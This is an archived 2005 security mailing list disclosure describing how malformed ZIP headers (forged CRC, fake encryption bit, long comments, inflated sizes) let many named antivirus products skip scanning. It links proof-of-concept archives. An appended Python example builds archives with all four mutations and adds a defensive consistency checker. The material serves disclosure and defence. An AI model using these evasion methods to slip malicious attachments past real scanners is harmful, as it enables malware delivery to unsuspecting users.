lists.openwall.net
Open Source and information security mailing list archives
Message-ID: <20050316150033.17827.qmail@web31508.mail.mud.yahoo.com>
Date: Wed, 16 Mar 2005 07:00:33 -0800 (PST)
From: bipin gautam <visitbipin@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Cc: vuln@...unia.com, bugtraq@...urityfocus.com
Subject: Re: Av issues


There has been a lot of noise and confusion regarding
all the issues reported lately... So, let me sum them
up.
___________________________________________________________________________________
Multiple Vendor Antivirus Products Malformed ZIP
Attachment Scan Evasion Vulnerability

Affected Product:
mks_vir
BitDefender 7.0
AntiVir
DrWeb 4.32b
eTrust-Iris 7.1.194.0
Fortinet 2.51
eTrust-Vet 11.7.0.0
McAfee 4445
Norman 5.70.10
Sybari 7.5.1314
Symantec 8.0
F-Prot 3.16a
Kaspersky
( Updated March 16, 2005 6:00 GMT )
Mitigation:
For the time being, set filter rules in your AV/email
gateway to filter out archives with embedded
executables (exe, com, pif, scr, cpl, etc.). Block all
types of broken archives and archives with passwords
in them.

Description:
1). If you create a zip archive with an invalid CRC
checksum, some AVs skip the archive, marking it as
clean. By this way, you can bypass antivirus gateways
and slip in any attachment without the archive being
scanned. Moreover, these days software tools
automatically repair a *broken* archive.
POC http://www.geocities.com/visitbipin/crc.zip
2). In the local file header, if you modify the
"general purpose bit flag" (7th & 8th byte of a zip
archive) with \x2f ie: "\", some AVs skip the file,
marking it as clean, because the AV comes to the false
assumption that the zip file is encrypted. This was
discovered during the analysis of the "Multiple AV
Vendor Incorrect CRC32 Bypass Vulnerability."

poc: http://www.geocities.com/visitbipin/gpbf.zip

3). If you have a long archive comment in a zip
archive, these AVs can't detect a virus embedded in
it. I came to know that Symantec 8.1 is immune to the
bug?
POC:
http://www.geocities.com/visitbipin/long_coment.zip

4). In the "local file header" & "data descriptor",
if you change the compressed size and uncompressed
size to greater than the actual file size, there are
many AVs that can't scan the file properly.

P0C: http://www.geocities.com/visitbipin/Antigen.zip
<--- try

Moreover, there are unzip utilities that go into a
loop if the file size is changed to ffffffff! Let's
hope the less popular AV/Trojan scanners out there
don't have such faulty code!
Unzip utilities will successfully extract such an
archive with some garbage data (\x00, 255 bytes) at
the end. (FORGE the crc right, first.) The garbage
data doesn't matter *that* much, because any malicious
code can execute without any problem with the garbage
at its end. This will successfully bypass AV detection
even for known malicious code, "MOST OF THE TIME", if
the AV detects "SOME" executable by comparing its
total checksum instead of analyzing a particular chunk
of code in the code's body. I think it's true for some
of those old little (few bytes) viruses. But modern AV
engines in most cases don't depend on such a primitive
technique to detect a virus, so it shouldn't be "that"
big an issue.
5). Another, 5th issue... and I'm feeling too lazy to
type/describe it now. Have a look at
http://www.securityfocus.com/archive/1/393291
Be noted,
http://www.geocities.com/visitbipin/test_nav.zip
...contains a self-extracting archive that will
extract the POC named *.eicar.zip. It is better to
extract it from the exe archive as there are some AVs
out there that can't even scan an infected file
embedded in a self-extracting zip archive! (O;


Names of vulnerable products were gathered from
feedback on the Full-Disclosure mailing list and some
private discussions with others and are believed to
be true. You can run the file through
www.virustotal.com, http://virusscan.jotti.org/
or http://sandbox.norman.no/live_4.html and you'll
know what I'm talking about. Though I understand
they might be using the CLI engine in most cases (if
not all), while there are other functionalities in a
full AV package that are not in the CLI-based engine.
Thanks to "Pedro Bustamante" for reminding me.
Another interesting link is
http://www.aerasec.de/security/index.html?id=ae-200503-020&lang=en
  Dr. Peter Bieringer's advisory.
Useful Reference:
http://www.pkware.com/company/standards/appnote/

regards,
Bipin Gautam
http://www.geocities.com/visitbipin/


Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information. 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/
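Editor's added example (not code from the post above or from any of the products it names): a small Python script that builds a minimal stored ZIP from the APPNOTE layout, applies the four header tricks the post describes (forged CRC-32, "encrypted" general purpose bit, oversized archive comment, local-header sizes larger than the real data), shows that a lenient extractor still hands back the untouched payload, and runs the structural consistency check a gateway scanner should perform before trusting the archive's own metadata. The member name, the payload bytes and the 1024-byte comment threshold are constructed for the demo; "encrypted" is taken to be APPNOTE general purpose bit 0.

```python
# Added example, not code from the original post. Builds a minimal stored ZIP,
# applies the four local-header tricks the post describes, and runs the
# structural consistency check a gateway scanner should do before trusting
# the archive's own metadata. Member name and payload are constructed stand-ins.
import struct
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
ENC_FLAG = 0x0001  # APPNOTE general purpose bit 0: "file is encrypted"

NAME = b"invoice.exe"  # constructed
DATA = b"MZ" + b"\x90" * 62 + b"demo-payload-not-real-malware"  # constructed


def build_zip(name=NAME, data=DATA, comment=b""):
    """One stored (method 0) member, no data descriptor, optional archive comment."""
    crc, n = zlib.crc32(data) & 0xFFFFFFFF, len(data)
    local = LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0, crc, n, n, len(name), 0) + name
    central = CENTRAL_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0, 0, crc, n, n,
                                        len(name), 0, 0, 0, 0, 0, 0) + name
    cd_off = len(local) + n
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(central), cd_off, len(comment))
    return local + data + central + eocd + comment


def _u(fmt, buf, off):
    return struct.unpack_from(fmt, buf, off)[0]

def _patch(buf, off, fmt, value):
    return buf[:off] + struct.pack(fmt, value) + buf[off + struct.calcsize(fmt):]

def _cd_offset(buf):
    return _u("<I", buf, buf.rfind(EOCD_SIG) + 16)  # EOCD +16 = central directory offset


# Trick 1: forge the CRC-32 in both headers; the member data itself is untouched.
def with_bad_crc(buf):
    buf = _patch(buf, 14, "<I", _u("<I", buf, 14) ^ 0xFFFFFFFF)
    cd = _cd_offset(buf)
    return _patch(buf, cd + 16, "<I", _u("<I", buf, cd + 16) ^ 0xFFFFFFFF)

# Trick 2: set the "encrypted" bit in the local header's general purpose flags (bytes 7-8).
def with_encrypted_flag(buf):
    return _patch(buf, 6, "<H", _u("<H", buf, 6) | ENC_FLAG)

# Trick 3: an oversized archive comment after the end-of-central-directory record.
def with_long_comment(size=0xFFFF):
    return build_zip(comment=b"A" * size)

# Trick 4: local-header compressed/uncompressed sizes larger than the real data.
def with_oversized_sizes(buf, extra=255):
    real = _u("<I", buf, 18)
    return _patch(_patch(buf, 18, "<I", real + extra), 22, "<I", real + extra)


def lenient_extract(buf):
    """What a repairing unzip hands the user for member 0: every byte between the
    local header and the central directory, ignoring CRC and the declared sizes."""
    n_len, x_len = struct.unpack_from("<HH", buf, 26)
    return buf[30 + n_len + x_len:_cd_offset(buf)]


def check_archive(buf, max_comment=1024):
    """Return inconsistencies between what the headers claim and the bytes present.
    An empty list means 'consistent'; anything else means 'do not mark clean'."""
    findings = []
    eocd = buf.rfind(EOCD_SIG)
    if eocd < 0:
        return ["no end-of-central-directory record"]
    cd_size, cd_off, comment_len = struct.unpack_from("<IIH", buf, eocd + 12)
    if comment_len > max_comment or eocd + 22 + comment_len != len(buf):
        findings.append("archive comment: length %d oversized or inconsistent" % comment_len)
    pos = cd_off
    while pos < cd_off + cd_size and buf.startswith(CENTRAL_SIG, pos):
        (c_flags, c_method, c_crc, c_csize, c_usize, n_len, x_len, m_len,
         l_off) = struct.unpack_from("<HH4xIIIHHH8xI", buf, pos + 8)
        name = buf[pos + 46:pos + 46 + n_len].decode("latin-1")
        pos += 46 + n_len + x_len + m_len
        if not buf.startswith(LOCAL_SIG, l_off):
            findings.append("%s: no local header at offset %d" % (name, l_off))
            continue
        l_flags, l_method, l_crc, l_csize, l_usize, ln_len, lx_len = \
            struct.unpack_from("<HH4xIIIHH", buf, l_off + 6)
        data_start = l_off + 30 + ln_len + lx_len
        if (l_flags, l_method, l_crc, l_csize, l_usize) != (c_flags, c_method, c_crc, c_csize, c_usize):
            findings.append("%s: local header disagrees with central directory" % name)
        if (l_flags | c_flags) & ENC_FLAG:
            findings.append("%s: encryption flag set, content not scannable as-is" % name)
        if data_start + max(l_csize, c_csize) > cd_off:
            findings.append("%s: declared size runs past the data area" % name)
        data = buf[data_start:data_start + c_csize]
        if c_method == 0 and zlib.crc32(data) & 0xFFFFFFFF != c_crc:
            findings.append("%s: stored data does not match CRC-32" % name)
    return findings


if __name__ == "__main__":
    clean = build_zip()
    for label, z in [("clean", clean), ("bad crc", with_bad_crc(clean)),
                     ("encrypted flag", with_encrypted_flag(clean)),
                     ("long comment", with_long_comment()),
                     ("oversized sizes", with_oversized_sizes(clean))]:
        print("%-16s payload intact=%s findings=%s"
              % (label, lenient_extract(z) == DATA, check_archive(z) or "none"))
```

The design point is the one the post keeps circling: every mutated archive still yields the original payload through `lenient_extract`, so a scanner that lets a CRC error, an encryption bit or an implausible length talk it out of looking at the bytes is scanning the metadata, not the content. A gateway should either scan what the extractor would produce, or treat any non-empty `check_archive` result as "not clean" rather than "skipped", which is the per-filter equivalent of the mitigation the post recommends.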